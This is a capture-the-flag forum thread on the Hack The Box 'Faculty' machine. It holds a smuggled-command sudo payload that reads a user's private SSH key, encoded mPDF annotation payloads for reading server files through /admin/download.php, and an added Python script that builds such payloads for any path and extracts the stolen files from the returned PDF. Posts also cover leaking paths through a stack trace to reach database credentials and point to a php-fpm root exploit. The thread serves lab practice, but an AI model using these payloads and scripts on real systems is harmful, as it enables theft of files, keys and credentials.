Faculty HTB - [DISCUSSION]
sudo -u developer /usr/local/bin/meta-git clone 'test||cat /home/developer/.ssh/id_rsa'
Reply
(July 2, 2022, 10:21 PM)Exa Wrote:
(July 2, 2022, 10:12 PM)Anandu Wrote:
(July 2, 2022, 10:03 PM)Exa Wrote:
(July 2, 2022, 09:40 PM)Bumper111 Wrote: For file read https://medium.com/@jonathanbouman/local-file-inclusion-at-ikea-com-e695ed64d82f


Nice, this one works for me. Minus the backslashes:


Sending it base64'd via /admin/download.php or adding entry in faculty.php?


Sending via /admin/download.php.

https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPg

pdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGFzc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1MjB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyMiUyNTIwLyUyNTNF


I logged in as administrator, tried to send base64 string to /admin/download.php?pdf=, am I doing something wrong?
Reply
(July 3, 2022, 02:17 AM)quick443 Wrote: I logged in as administrator, tried to send base64 string to /admin/download.php?pdf=, am I doing something wrong?


You need to use Burp to intercept the request then modify it with base64 data and forward it.
Reply
(July 3, 2022, 02:27 AM)Himitsu Wrote: You need to use Burp to intercept the request then modify it with base64 data and forward it.


blank pdf, I'll keep trying
Reply
(July 3, 2022, 03:38 AM)quick443 Wrote:
(July 3, 2022, 02:27 AM)Himitsu Wrote:
(July 3, 2022, 02:17 AM)quick443 Wrote:
(July 2, 2022, 10:21 PM)Exa Wrote:
(July 2, 2022, 10:12 PM)Anandu Wrote: Sending it base64'd via /admin/download.php or adding entry in faculty.php?


Sending via /admin/download.php.

https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPg

pdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGFzc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1MjB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyMiUyNTIwLyUyNTNF


I logged in as administrator, tried to send base64 string to /admin/download.php?pdf=, am I doing something wrong?

You need to use Burp to intercept the request then modify it with base64 data and forward it.


blank pdf, I'll keep trying


The annotation gets added as a dot. Best to download the file, open it in a pdf reader (and not the browser). Once I did that, I was able to see the attached file on the pdf
Reply
thanks
Reply
(July 3, 2022, 03:50 AM)ryzen Wrote:
(July 3, 2022, 03:38 AM)quick443 Wrote:
(July 3, 2022, 02:27 AM)Himitsu Wrote:
(July 3, 2022, 02:17 AM)quick443 Wrote:
(July 2, 2022, 10:21 PM)Exa Wrote: Sending via /admin/download.php.

https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPg

pdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGFzc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1MjB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyMiUyNTIwLyUyNTNF


I logged in as administrator, tried to send base64 string to /admin/download.php?pdf=, am I doing something wrong?

You need to use Burp to intercept the request then modify it with base64 data and forward it.


blank pdf, I'll keep trying


The annotation gets added as a dot. Best to download the file, open it in a pdf reader (and not the browser). Once I did that, I was able to see the attached file on the pdf


Thanks, do you recommend any that work? the one that comes by default does not work
Reply
(July 3, 2022, 04:07 AM)quick443 Wrote:
(July 3, 2022, 03:50 AM)ryzen Wrote:
(July 3, 2022, 03:38 AM)quick443 Wrote:
(July 3, 2022, 02:27 AM)Himitsu Wrote:
(July 3, 2022, 02:17 AM)quick443 Wrote: I logged in as administrator, tried to send base64 string to /admin/download.php?pdf=, am I doing something wrong?

You need to use Burp to intercept the request then modify it with base64 data and forward it.


blank pdf, I'll keep trying


The annotation gets added as a dot. Best to download the file, open it in a pdf reader (and not the browser). Once I did that, I was able to see the attached file on the pdf


Thanks, do you recommend any that work? the one that comes by default does not work


I'm running on Parrot OS. I used whatever is default (Atril Document Viewer). Another comment mentioned you can use Firefox and then open the sidebar in the pdf view.
Reply
(July 2, 2022, 11:21 PM)OldName2 Wrote: I can't see the path from LFI to SSH key, is there a different approach?


Sadly, using the leaked SSH key, people skipped a couple of steps.

Here is my approach for what to do after the LFI:

Login and open http://faculty.htb/index.php. You will see this request in Burp:
POST /admin/ajax.php?action=get_schecdule
It has the body parameter faculty_id=1.
When I change it to "test, I can see a stack trace which reveals the full path:
/var/www/scheduling/admin/admin_class.php

Knowing the full path, I downloaded /var/www/scheduling/index.php using the mpdf exploit. From there you can find the DB credentials.
Reply
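The two steps the thread describes, encoding an mPDF annotation for the pdf= parameter of /admin/download.php (Exa's CyberChef recipe: URL-encode twice, then base64) and then reading the attachment out of the returned PDF instead of hunting for the dot in a viewer, written out as an added Python example. This is not code from the thread or from the box; the payload builder reproduces the thread's own value for /etc/passwd and can be pointed at the path the stack trace reveals, /var/www/scheduling/index.php. The extractor walks the PDF for /Type /EmbeddedFile streams and inflates them. The sample PDF built at the bottom is constructed for the demo (just the two objects the extractor needs), not real output from the target, and the exact request shape (method, cookie) is left to Burp as the thread suggests.

```python
import base64
import re
import zlib
from urllib.parse import quote, unquote

# Characters that JavaScript's encodeURI() leaves untouched, which is what CyberChef's
# "URL Encode" does with "encode all special chars" off. Python's quote() additionally
# never encodes letters, digits, "_", ".", "-" and "~".
ENCODE_URI_SAFE = ";,/?:@&=+$!*'()#"


def annotation_tag(path: str, icon: str = "Graph", pos_x: int = 195) -> str:
    """mPDF <annotation> tag that attaches a server-side file to the rendered PDF."""
    return (f'<annotation file="{path}" content="{path}" icon="{icon}" '
            f'title="Attached File: {path}" pos-x="{pos_x}" />')


def double_url_encode(s: str) -> str:
    """Two passes of URL encoding; the second pass turns every '%' into '%25'."""
    return quote(quote(s, safe=ENCODE_URI_SAFE), safe=ENCODE_URI_SAFE)


def build_pdf_param(path: str) -> str:
    """Value for the pdf= parameter: base64(urlencode(urlencode(<annotation .../>)))."""
    return base64.b64encode(double_url_encode(annotation_tag(path)).encode()).decode()


def decode_pdf_param(value: str) -> str:
    """Inverse of build_pdf_param, for checking a value copied out of Burp."""
    return unquote(unquote(base64.b64decode(value).decode()))


STREAM_RE = re.compile(rb"stream\r?\n")
# Direct "/Length N" only; "/Length N G R" (indirect) is rejected by the lookahead.
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?![\d\s]*R)")


def extract_embedded_files(pdf: bytes) -> list:
    """Return the bytes of every /EmbeddedFile stream in a PDF, inflating FlateDecode.

    Viewers draw the attachment as a small icon (the "dot") and browser viewers
    often hide it, so pulling the stream out directly is the reliable route.
    """
    files = []
    for m in re.finditer(rb"/Type\s*/EmbeddedFile\b", pdf):
        sm = STREAM_RE.search(pdf, m.end())
        if sm is None:
            continue
        # Dictionary of the object holding this stream: from the preceding "N G obj"
        # up to the stream keyword.
        header = pdf[pdf.rfind(b" obj", 0, m.start()):sm.start()]
        lm = LENGTH_RE.search(header)
        if lm:
            data = pdf[sm.end():sm.end() + int(lm.group(1))]
        else:  # indirect length: fall back to the endstream keyword, strip one EOL
            end = pdf.find(b"endstream", sm.end())
            if end == -1:
                continue
            data = pdf[sm.end():end]
            if data.endswith(b"\r\n"):
                data = data[:-2]
            elif data.endswith(b"\n"):
                data = data[:-1]
        if b"/FlateDecode" in header:
            data = zlib.decompressobj().decompress(data)  # tolerates trailing bytes
        files.append(data)
    return files


def build_sample_pdf(content: bytes) -> bytes:
    """Constructed stand-in for a download.php response: only the embedded-file
    object and its FileAttachment annotation, not a complete PDF."""
    body = zlib.compress(content)
    return (b"%PDF-1.4\n"
            + b"5 0 obj\n<</Type /EmbeddedFile /Filter /FlateDecode /Length "
            + str(len(body)).encode() + b">>\nstream\n" + body + b"\nendstream\nendobj\n"
            + b"6 0 obj\n<</Type /Annot /Subtype /FileAttachment /Name /Graph "
            + b"/Rect [195 700 205 710] /FS <</Type /Filespec /EF <</F 5 0 R>>>>>>\nendobj\n"
            + b"%%EOF\n")


if __name__ == "__main__":
    for target in ("/etc/passwd", "/var/www/scheduling/index.php"):
        print(f"pdf={build_pdf_param(target)}\n")
    # Demo on the constructed sample; on the real box, read the saved PDF instead:
    #   extract_embedded_files(open("download.pdf", "rb").read())
    sample = build_sample_pdf(b"root:x:0:0:root:/root:/bin/bash\n")
    for blob in extract_embedded_files(sample):
        print(blob.decode(errors="replace"), end="")
```

Paste the printed pdf= value into the intercepted request in Burp, save the response body to a file, and run extract_embedded_files over it; a FlateDecode stream whose inflated bytes start with "root:x:0:0" confirms the read worked even when the viewer shows only a blank page with a dot.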
For root, my best guess as of now is that we have to abuse the php-fpm master process running as root. Found this
https://www.ambionics.io/blog/php-fpm-local-root
Although by now, I'm also wondering if this is a rabbit hole I've gotten myself into
Reply